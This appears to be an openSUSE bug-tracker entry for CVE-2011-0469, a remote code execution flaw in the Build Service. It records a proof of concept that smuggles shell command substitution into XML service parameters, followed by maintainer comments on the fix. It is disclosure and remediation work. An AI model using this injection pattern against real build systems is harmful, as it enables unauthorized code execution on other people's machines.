Bug 679325 (CVE-2011-0469)

Summary: VUL-0: CVE-2011-0469: openSUSE Build Service: remote code execution
Product: [openSUSE] openSUSE.org Reporter: Matthias Weckbecker <mweckbecker>
Component: BuildServiceAssignee: Adrian Schröter <adrian.schroeter>
Status: RESOLVED FIXED QA Contact: Adrian Schröter <adrian.schroeter>
Severity: Major    
Priority: P2 - High CC: meissner, security-team
Version: unspecified   
Target Milestone: ---   
Hardware: Other   
OS: Other   
Whiteboard:
Found By: --- Services Priority:
Business Priority: Blocker: ---
Marketing QA Status: --- IT Deployment: ---

Description Matthias Weckbecker 2011-03-14 10:50:33 UTC
Adrian, as discussed last week the service-code contains various remote code execution vulnerabilities which allow attackers to execute arbitrary code on build systems with nobody-privileges. 

Ludwig suggested to open a bug for the issue in order to keep it tracked.

POC:

Add the following service to your project to get access to a machine w/ internet connectivity:

 <services>
  <service name="download_url">
    <param name="protocol">ftp</param>
    <param name="host">cpan.myclash.net</param>
    <param name="path">$(uname -a; exit 0)</param>
  </service>
  <service name="verify_file">
    <param name="file">$(uname -a)</param>
    <param name="verifier">md5</param>
    <param name="checksum">645ea983242177e446d68905cb5ecda5</param>
  </service>
 </services>
Comment 1 Ludwig Nussel 2011-03-14 10:59:31 UTC
use CVE-2011-0469
Comment 2 Christian Dengler 2011-03-14 11:28:10 UTC
The first script, I found this issue in, is fixed now (sr 64070).

But the other services, especially with network connection, contain a higher risk.
Comment 3 Adrian Schröter 2011-03-14 11:31:33 UTC
This was only possible when using the "experimental lxc wrapper for additional security ;)". This is fixed now. I will include the fix in next 2.1 release, but I have some serious doubts that anyone else ever used the LXC wrapper (because it is quite tricky to get it working anyway).
Comment 4 Adrian Schröter 2011-03-14 11:33:19 UTC
Comment 2: The problem was not the particular service, it was buggy, but safe. The problem was the lxc wrapper script (only used on server side so far).
Comment 6 Marcus Meissner 2017-08-02 15:58:24 UTC
no official announcemnet on openbuildservice.org.